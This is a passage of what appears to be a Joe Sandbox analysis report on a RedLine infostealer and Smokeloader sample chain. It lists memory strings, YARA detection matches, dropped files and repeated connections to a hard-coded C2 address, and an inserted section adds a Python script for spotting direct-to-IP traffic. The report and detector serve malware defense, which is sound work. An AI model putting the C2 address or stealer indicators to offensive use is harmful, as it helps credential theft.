                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                      Source: dvL76s65.exe, 0000000F.00000002.416452346.0000000005CCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: kino0095.exe, 00000001.00000003.261924931.0000000004C7C000.00000004.00000020.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.412783124.0000000004A20000.00000004.08000000.00040000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000003.346294709.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413068385.0000000004C10000.00000004.08000000.00040000.00000000.sdmp, en675431.exe.1.drString found in binary or memory: https://api.ip.sb/ip
                      Source: dvL76s65.exe, 0000000F.00000002.416452346.0000000005CCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: dvL76s65.exe, 0000000F.00000002.416452346.0000000005CCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004FA3000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005ED2000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005F50000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005E37000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004F16000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000005030000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005DB9000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005D5D000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005F8C000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005DD6000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005F33000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004DFD000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005EB5000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004E8A000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005CB2000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005CCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: dvL76s65.exe, 0000000F.00000002.416452346.0000000005CCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004FA3000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005ED2000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005F50000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005E37000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004F16000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000005030000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005DB9000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005D5D000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005F8C000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005DD6000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005F33000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004DFD000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005EB5000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004E8A000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005CB2000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005CCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004FA3000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005ED2000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005F50000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005E37000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004F16000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000005030000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005DB9000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005D5D000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005F8C000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005DD6000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005F33000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004DFD000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005EB5000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004E8A000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005CB2000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005CCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
                      Source: dvL76s65.exe, 0000000F.00000002.416452346.0000000005ED2000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005F50000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005D5D000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005DD6000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005CCF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004FA3000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005ED2000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005F50000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005E37000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004F16000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000005030000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005DB9000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005D5D000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005F8C000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005DD6000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005F33000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004DFD000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005EB5000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004E8A000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005CB2000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005CCF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
                      Source: dvL76s65.exe, 0000000F.00000002.413281318.0000000004FA3000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005ED2000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005F50000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005E37000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004F16000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000005030000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005DB9000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005D5D000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005F8C000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005DD6000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005F33000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004DFD000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005EB5000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.413281318.0000000004E8A000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005CB2000.00000004.00000800.00020000.00000000.sdmp, dvL76s65.exe, 0000000F.00000002.416452346.0000000005CCF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: unknown | TCP traffic detected without corresponding DNS query: 193.233.20.30 (35 connection events to this IP)
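All 35 connections above go to 193.233.20.30 without any DNS lookup, the usual footprint of a C2 address hard-coded into a stealer's configuration. The following is an added example, not part of the Joe Sandbox report, of the correlation a SOC would run over its own DNS and flow telemetry to surface direct-to-IP traffic: every TCP destination that did not appear as a DNS answer earlier in the log, after excluding local ranges and an allowlist. The key=value log format and every address except 193.233.20.30 are constructed for the example.

```python
"""Flag outbound TCP connections whose destination IP was never returned by a
DNS answer earlier in the same log (direct-to-IP traffic, e.g. hard-coded C2).
Added example for the sandbox report above; the key=value log format is
constructed and only 193.233.20.30 is taken from the report."""
from __future__ import annotations

import ipaddress
from dataclasses import dataclass
from typing import Iterable

# Ranges that legitimately see traffic without DNS (LAN, loopback, link-local,
# multicast). Listed explicitly so the documentation ranges used below still
# count as "external" for the demonstration.
LOCAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16", "224.0.0.0/4",
)]

# Constructed telemetry. Resolved hosts use RFC 5737 documentation addresses.
SAMPLE_EVENTS = [
    "ts=1 type=dns qname=www.example.com answer=203.0.113.10",
    "ts=2 type=tcp src=192.168.1.20 dst=203.0.113.10 dport=443",
    "ts=3 type=tcp src=192.168.1.20 dst=193.233.20.30 dport=80",
    "ts=4 type=tcp src=192.168.1.20 dst=193.233.20.30 dport=80",
    "ts=5 type=tcp src=192.168.1.20 dst=193.233.20.30 dport=80",
    "ts=6 type=tcp src=192.168.1.20 dst=192.168.1.1 dport=445",
    "ts=7 type=tcp src=192.168.1.20 dst=198.51.100.7 dport=443",
    "ts=8 type=dns qname=cdn.example.net answer=198.51.100.7",
]


@dataclass
class Hit:
    dst: str
    dport: int
    first_ts: int
    count: int = 0


def parse_kv(line: str) -> dict[str, str]:
    """Split 'k=v k=v ...' into a dict; tokens without '=' are ignored."""
    return dict(f.split("=", 1) for f in line.split() if "=" in f)


def is_local(addr: str) -> bool:
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in LOCAL_NETS)


def find_direct_to_ip(events: Iterable[str],
                      allowlist: frozenset[str] = frozenset()) -> list[Hit]:
    """Return external destinations contacted before any DNS answer named them.

    Order matters: a connection that precedes the DNS answer for its IP is
    still reported (ts=7 in the sample), so feed events in capture order.
    """
    resolved: set[str] = set()
    hits: dict[tuple[str, int], Hit] = {}
    for line in events:
        kv = parse_kv(line)
        kind = kv.get("type")
        if kind == "dns" and "answer" in kv:
            resolved.add(kv["answer"])
        elif kind == "tcp":
            dst, dport = kv["dst"], int(kv["dport"])
            if dst in resolved or dst in allowlist or is_local(dst):
                continue
            hit = hits.setdefault((dst, dport), Hit(dst, dport, int(kv["ts"])))
            hit.count += 1
    # Most-contacted first; address as a stable tie-break for deterministic output.
    return sorted(hits.values(), key=lambda h: (-h.count, h.dst))


if __name__ == "__main__":
    for h in find_direct_to_ip(SAMPLE_EVENTS):
        print(f"{h.dst}:{h.dport}  first_seen=ts{h.first_ts}  connections={h.count}")
```

To run this against real data, feed Zeek dns.log/conn.log or Sysmon Event ID 22 and 3 records converted to the same key=value form, and put known direct-to-IP destinations (NTP pools, update CDNs pinned by address) in the allowlist so that the remaining hits are worth an analyst's time.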

                      System Summary

                      Source: 15.2.dvL76s65.exe.2cd7c6e.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                      Source: 13.2.con1332.exe.2bf0e67.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                      Source: 13.3.con1332.exe.2c20000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                      Source: 13.2.con1332.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                      Source: 15.2.dvL76s65.exe.4a20000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                      Source: 15.2.dvL76s65.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                      Source: 1.3.kino0095.exe.4d2a220.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                      Source: 15.2.dvL76s65.exe.2c00e67.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                      Source: 15.2.dvL76s65.exe.4a20ee8.5.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                      Source: 15.2.dvL76s65.exe.4c10000.6.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                      Source: 13.2.con1332.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                      Source: 15.2.dvL76s65.exe.4c10000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                      Source: 15.3.dvL76s65.exe.2c80000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                      Source: 15.2.dvL76s65.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                      Source: 15.2.dvL76s65.exe.4a20000.4.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                      Source: 15.2.dvL76s65.exe.2cd6d86.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                      Source: 15.2.dvL76s65.exe.2cd6d86.2.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                      Source: 1.3.kino0095.exe.4d2a220.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                      Source: 15.2.dvL76s65.exe.4a20ee8.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                      Source: 15.2.dvL76s65.exe.2cd7c6e.3.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                      Source: 0000000F.00000002.412783124.0000000004A20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                      Source: 0000000F.00000003.345188702.0000000002C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                      Source: 0000000F.00000002.411952742.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f, Author: unknown
                      Source: 0000000F.00000002.411593767.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                      Source: 0000000F.00000002.412282672.0000000002E28000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c, Author: unknown
                      Source: 0000000D.00000002.328271047.0000000002DE6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c, Author: unknown
                      Source: 00000000.00000002.447521600.0000000006902000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c, Author: unknown
                      Source: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                      Source: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f, Author: unknown
                      Source: 0000000F.00000002.413068385.0000000004C10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                      Source: 0000000D.00000003.302283247.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                      Source: 00000000.00000002.447701625.0000000006A00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f, Author: unknown
                      Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\en675431.exe, type: DROPPED | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exe | Code function: 0_2_00403BA2
                      Source: C:\Users\user\Desktop\szDGo5lHdI.exe | Code function: 0_2_00405C9E
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe | Code function: 1_2_010B3BA2
                      Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe | Code function: 1_2_010B5C9E
                      Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe | Code function: 2_2_00963BA2
                      Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe | Code function: 2_2_00965C9E
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe | Code function: 3_2_00193BA2
                      Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe | Code function: 3_2_00195C9E
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_00408C60
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_0040DC11
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_00407C3F
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_00418CCC
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_00406CA0
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_004028B0
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_0041A4BE
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_00418244
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_00401650
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_00402F20
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_004193C4
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_00418788
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_00402F89
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_00402B90
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_004073A0
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_02BF2B17
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_02BF18B7
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_02BF786D
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_02C089EF
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_02BF3187
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_02BF31F0
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_02BF7EA6
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_02BF8EC7
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_02BFDE78
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_02BF77D9
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_02BF6F07
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_02C0A725
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_02C08F33
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_02C084AB
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_02BF2DF7
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_046B0DB0
                      Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe | Code function: 13_2_046B0B78
                      Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\IXP000.TMP\ge821663.exe 319B22945BEEB7424FE6DB1E9953AD5F2DC12CBBA2FE24E599C3DEDA678893BB
                      Source: szDGo5lHdI.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 15.2.dvL76s65.exe.2cd7c6e.3.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 13.2.con1332.exe.2bf0e67.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 13.3.con1332.exe.2c20000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 13.2.con1332.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 15.2.dvL76s65.exe.4a20000.4.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 15.2.dvL76s65.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 1.3.kino0095.exe.4d2a220.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 15.2.dvL76s65.exe.2c00e67.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 15.2.dvL76s65.exe.4a20ee8.5.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 15.2.dvL76s65.exe.4c10000.6.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 13.2.con1332.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 15.2.dvL76s65.exe.4c10000.6.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
